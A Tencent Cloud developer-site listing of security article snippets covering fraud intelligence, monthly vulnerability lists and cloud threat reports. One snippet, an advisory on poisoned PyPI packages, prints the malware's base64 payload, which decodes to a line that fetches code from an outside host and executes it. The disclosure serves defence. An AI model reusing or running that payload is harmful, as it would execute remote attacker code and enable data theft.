- 综合排序
- 最热优先
- 最新优先
- 来自专栏顶象技术业务安全专栏
业务安全情报第16期 | 大促8成优惠券竟被“羊毛党”抢走!?
八成秒杀账户是羊毛党根据顶象防御云编号为BSI-2023-rutq业务安全情报发现,某电商平台为吸引人气和促进销售推,推出高额折扣券福利,凡是注册用户均可免费领取。 顶象防御云业务安全情报中心监测发现,该电商一天有3场秒杀活动。在秒杀活动的15分钟内,羊毛党开始聚集,最高峰时竟然达到95。开始前5分钟内,羊毛党账户最高达84.15%。 基于上安全规则,顶象防御云业务安全情报中心建议业务安全体系做如下调整。1、快速识别异常风险。有效识别风险IP来源账号,异常token设备、异常行为的操作等。2、及时拦截羊毛党账号。 安全防护及产品组合建议基于安全规则,顶象防御云业务安全情报中心推荐如下防控产品组合。1、配置设备指纹+决策引擎。 汇集了4380条风险策略、112类风险情报、覆盖24个行业、118种风险类型,防控精准度>99.9%,1天内便可实现从风险到情报的转化,行业风险感知能力实力加强,同时支持安全用户无感通过,实时对抗处置能力更是缩减至
2K20编辑于 2023-06-01 - 来自专栏顶象技术业务安全专栏
业务安全情报,预知发现黑灰产的企业攻击
安全情报帮助企业提前发现攻击 12月13日,“现异地购药攻略抢占县城退烧药”冲上热搜。顶象防御云业务安全情报中心监测发现,多个社交平台上有用户发布了“异地网购药品攻略”。 8月份,顶象防御云业务安全情报中心监测发现,二手车平台和社区里,有大量的车企用户积分、商品兜售的消息,涉及车企平台众多,且部分卖家写明可长期供应,支持代下单等字样,挂售积分也远超个人用户通过打卡任务获取的积分数量 业务安全情报是指从安全数据中分析出与业务威胁相关的信息,通过对数据的汇总整理、加工生产、分析应用及协同共享机制,从而提炼总结出有价值情报内容。 业务安全情报不仅推动安全数据共享,打通了各个业务的孤岛,实现由被动抵御到主动防护,帮助企业掌握安全主动权。 ,为安全人员提供及时、准确、有效的情报内容,帮助安全人员系统掌握业务安全态势、威胁路径、影响范围等,分析挖掘出攻击特征、潜在隐患,从而及时有效提升安全应急响应能力,制定科学有效的防控策略。
65520编辑于 2022-12-20 - 来自专栏顶象技术业务安全专栏
顶象业务安全情报如何帮助企业“弄懂”黑灰产?
顶象业务安全情报如何帮助企业“弄懂”黑灰产?顶象业务安全情报——企业一眼“看透”黑灰产不可否认,随着互联网的发展,黑灰产们也变得越来越“聪明”。 企业如何保证业务安全与监管之间的平衡?而业务情报恰恰能够完美的解决这些问题。关注顶象的同学应该对业务安全情报并不陌生。 今年6月起,顶象防御云业务安全情报中心持续输出了多期业务安全情报,内容涵盖电商、银行、汽车、游戏、NFT、保险等多个行业。 强大信源+多方算法技术加持+覆盖24个行业的业务安全情报1、30000+数据源顶象业务安全情报汇集了线上30000+数据源,可以第一时间将同行业、跨行业以及攻防实验室发现的风险同步给线上所有客户,实现感知即防控 同时这也是是顶象业务安全情报产品在反电信网络诈骗上的首次应用。值得一提的是,顶象业务安全情报将于近期正式推出,防御云用户可免费抢先体验,后续请持续关注顶象动态哦!
62220编辑于 2022-12-09 - 来自专栏安全攻防团队
腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单
欢迎关注 腾讯安全威胁情报中心 腾讯安全攻防团队 A&D Team 腾讯安全 威胁情报团队 腾讯安全威胁情报中心推出2023年8月份必修安全漏洞清单,所谓必修漏洞,就是运维人员必须修复、不可拖延、影响范围较广的漏洞 腾讯安全威胁情报中心定期发布安全漏洞必修清单,以此指引政企客户安全运维人员修复漏洞,从而避免重大损失。 影响版本: WinRAR < 6.23 修复建议: 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 http://www.jeecg.com/doc/log 六、IIS ASP.NET 下的权限绕过/权限提升漏洞 概述: 2023年8月,微软发布了2023年8月安全更新补丁,共发布了87个漏洞的补丁程序 具体操作步骤可参考以下文章指引:https://s.tencent.com/research/report/157 腾讯安全威胁情报中心 腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台
1.2K20编辑于 2023-11-09 - 来自专栏我的安全视界观
【业务安全】业务安全之另类隐患
在漏洞回归的时候,也会发现新的隐患; 一条短短的验证码,可能酿成一场事故; 业务安全之另类隐患,希望和大家分享鲜有人说的点点滴滴。 1、系统登录处暴力破解 ---- 1.1 回归漏洞 某业务系统在修复安全问题,并进行部分功能调整后进行安全提测,内容如下: ? 接收到提测邮件后,安全测试人员首先对已知漏洞在测试环境进行验证。 但事已至此,吃一堑需要长一智,在痛苦的经历中学习提高,关于对业务可能造成高风险危害的操作尽量少做或不做: 漏洞扫描、漏洞利用等高危操作,尽量做到事先告知业务方 安全测试前先评估影响范围,尽量确保对业务和用户无影响 2.4 深刻体悟 业务方面的安全隐患,可能不仅仅是由于业务逻辑造成,其他不规范的操作也起到一定的助攻成分。 业务相关的漏洞修复,推动改起来甚至比web漏洞更加难,因为产品要考虑友好度和便捷性。 不过也可以找到其他次之的修复方案,在安全和业务之间找到平衡点,让安全真正的为业务保驾护航。
96730发布于 2018-10-08 - 来自专栏OpenSCA
安全情报 | Pypi再现窃密攻击投毒
概述悬镜安全自研的开源组件投毒检测平台通过对主流开源软件仓库(包括Pypi、NPM、Ruby等)发布的组件包进行持续性监控和自动化代码安全分析,同时结合专家安全经验复审,能够及时发现组件包投毒事件并精确定位恶意代码片段 (https://www.pepy.tech/projects/urllitelib)目前这些投毒包已从官方仓库中下架,经悬镜供应链安全实验室确认,国内各大主流Pypi镜像源仍缓存这些恶意投毒包 ,对于使用国内镜像源的广大开发者来说依旧面临潜在的安全风险 悬镜安全提醒国内开发者们自行排查是否安装或引用以下Python恶意组件包。 Payload使用base64进行简单编码:ZXhlYyhyZXF1ZXN0cy5nZXQoJ2h0dHA6Ly93cHAtYXBpLTAxaHcub25yZW5kZXIuY29tL2FwaS9zdGVhbC8xMTQwODg0NDgxNjcxMTg4NTgxLycsIGhlYWRlcnM9eydhdXRoJzogJyYmQ0QmJk9OJ30pLmpzb24oKVsnY29kZSddKQbase64 , "release_date": "2023-09-18" }]悬镜安全也将持续监测和挖掘未知的开源组件安全风险,并及时对供应链投毒事件进行分析披露。
70340编辑于 2023-09-19 - 来自专栏Timeline Sec
安全威胁情报周报(01.18-01.24)
一周情报摘要 金融威胁情报 Capital Economics 泄露超 50 万高层用户记录 俄罗斯加密货币交易所 Livecoin 遭黑客攻击后关闭 Elon Musk 加密货币充值返双倍骗局,黑客一周获利 58万美元 拉丁美洲银行木马 Vadokrist 揭秘 政府威胁情报 苏格兰环境保护局遭到 Conti 勒索软件攻击 能源威胁情报 黑客绕过 Microsoft Office 365 高级威胁防护对企业进行钓鱼攻击 ,能源行业位居受害榜第二 工控威胁情报 FiberHome 路由器中发现多个后门和漏洞 流行威胁情报 FBI 警告:窃取凭据的语音网络钓鱼活动正在兴起 高级威胁情报 SolarWinds 供应链攻击中发现第 能源威胁情报 黑客绕过 Microsoft Office 365 高级威胁防护对企业进行钓鱼攻击,能源行业位居受害榜第二 Check point 联合 Otorio 对2020年8月的一起全球性大规模钓鱼攻击活动展开调查 2020年5月,美国商务部将 FiberHome 和其他8家中国科技公司列入黑名单,限制其接触美国公司、出口和技术。
1.5K40发布于 2021-02-03 API安全防御体系的深度分析:联动腾讯Web应用防火墙、腾讯安全威胁情报、腾讯天御业务安全
本文旨在提供一个客观、深度的分析,探讨如何通过联动腾讯Web应用防火墙、腾讯安全威胁情报、腾讯天御业务安全等能力,帮助企业全面识别API风险,针对性收敛API暴露面,构建全面、智能、精准的API全生命周期安全防御体系 腾讯安全威胁情报 腾讯安全威胁情报提供了全球范围内的网络威胁数据和分析。通过这些情报,企业能够了解最新的安全趋势和威胁,从而提前做好防范。 API风险识别:利用威胁情报,识别API可能面临的风险,提前做好防御。 腾讯天御业务安全 腾讯天御业务安全平台提供了业务安全解决方案,包括反欺诈、风险控制等功能,帮助企业保护业务免受恶意行为的影响。 联动防御:与腾讯云WAF和安全威胁情报联动,构建全面的API安全防御体系。 结论 通过联动腾讯Web应用防火墙、腾讯安全威胁情报、腾讯天御业务安全等能力,企业能够构建一个全面、智能、精准的API全生命周期安全防御体系。
23610编辑于 2025-07-28- 来自专栏安全攻防团队
云安全风险情报(10.16-10.22)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 近期参考链接: 腾讯安全威胁情报中心推出2023年9月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单
41240编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(10.23-10.29)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 近期参考链接: 腾讯安全威胁情报中心推出2023年9月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单
63440编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(1.01-1.14)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 2.1 团伙变动 Fourloko团伙:因下载执行文件包含Fourloko,固命名为Fourloko。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 官方网址:https://tix.qq.com/ 腾讯安全SOC+私有化安全产品已全面集成威胁情报能力,包括腾讯NDR御界、腾讯NDR天幕、腾讯SOC,助力用户安全运营体系第一时间发现和响应关键威胁。 近期参考链接: 腾讯安全威胁情报中心推出2023年11月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年10月必修安全漏洞清单
49210编辑于 2024-01-19 - 来自专栏安全攻防团队
云安全风险情报(1.15-1.28)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 1)C2威胁情报 WeDetect已持续累计捕获云上C2相关情报,提供威胁情报价值。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 官方网址:https://tix.qq.com/ 腾讯安全SOC+私有化安全产品已全面集成威胁情报能力,包括腾讯NDR御界、腾讯NDR天幕、腾讯SOC,助力用户安全运营体系第一时间发现和响应关键威胁。
40710编辑于 2024-02-05 - 来自专栏安全攻防团队
云安全风险情报(11.13-11.19)
腾讯安全基于云原生安全体系,通过实时监测各类针对云上资产的攻击行为,持续感知在野攻击情况。 以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 1)C2威胁情报 WeDetect已持续累计捕获云上C2相关情报,提供威胁情报价值。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。
38210编辑于 2023-11-22 - 来自专栏安全攻防团队
云安全风险情报(10.30-11.05)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 近期参考链接: 腾讯安全威胁情报中心推出2023年9月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单
52671编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(09.11-09.17)
腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 官方网址:https://tix.qq.com/ 腾讯安全SOC+私有化安全产品已全面集成威胁情报能力,包括腾讯NDR御界、腾讯NDR天幕、腾讯SOC,助力用户安全运营体系第一时间发现和响应关键威胁。 近期参考链接: 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单 腾讯安全攻防团队 A&D Team 腾讯安全攻防团队 A&
40830编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(11.27-12.03)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 近期参考链接: 腾讯安全威胁情报中心推出2023年10月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年9月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单 腾讯安全攻防团队 A&D Team
68110编辑于 2023-12-10 - 来自专栏安全攻防团队
云安全风险情报(08.28-09.03)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 近期参考链接: 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单 腾讯安全攻防团队 A&D Team 腾讯安全攻防团队 A&D Team专注于安全前沿攻防技术研究。
37220编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(07.31-08.06)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 Behinder ysoserial[新增] ShiroAttack2 Top3 Java内存马类型如下,此外还新增了针对WebLogic的Servlet型: Filter型 Servlet型 Listener型 8) 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 近期参考链接: 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出
52530编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(10.09-10.15)
2)总览 本周,腾讯安全【云上威胁狩猎系统】(后简称WeDetect)共捕获到 59 个有效漏洞攻击事件、8 种持久化攻击类型、421 个活跃攻击IP。 以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 近期参考链接: 腾讯安全威胁情报中心推出2023年9月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单
41330编辑于 2023-11-09 - 来自专栏安全攻防团队
云安全风险情报(11.06-11.12)
以便各行业及时掌握云安全的关键风险,结合自身资产采取相应缓解措施,确保数据及业务的安全。 腾讯安全-威胁情报中心 腾讯安全威胁情报中心(TIX)提供一站式安全情报服务,包括TIX-ASM(攻击面管理)、TIX-情报查询社区、TIX-SDK/API(情报原子能力)、TIX-TIP(威胁情报平台 腾讯安全情报产品矩阵已全系加持云上风险最新威胁情报能力,为用户构建全面的威胁监测视野。 近期参考链接: 腾讯安全威胁情报中心推出2023年9月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年8月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年7月必修安全漏洞清单 腾讯安全威胁情报中心推出 2023年6月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年5月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年4月必修安全漏洞清单 腾讯安全威胁情报中心推出2023年3月必修安全漏洞清单
62320编辑于 2023-11-14
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号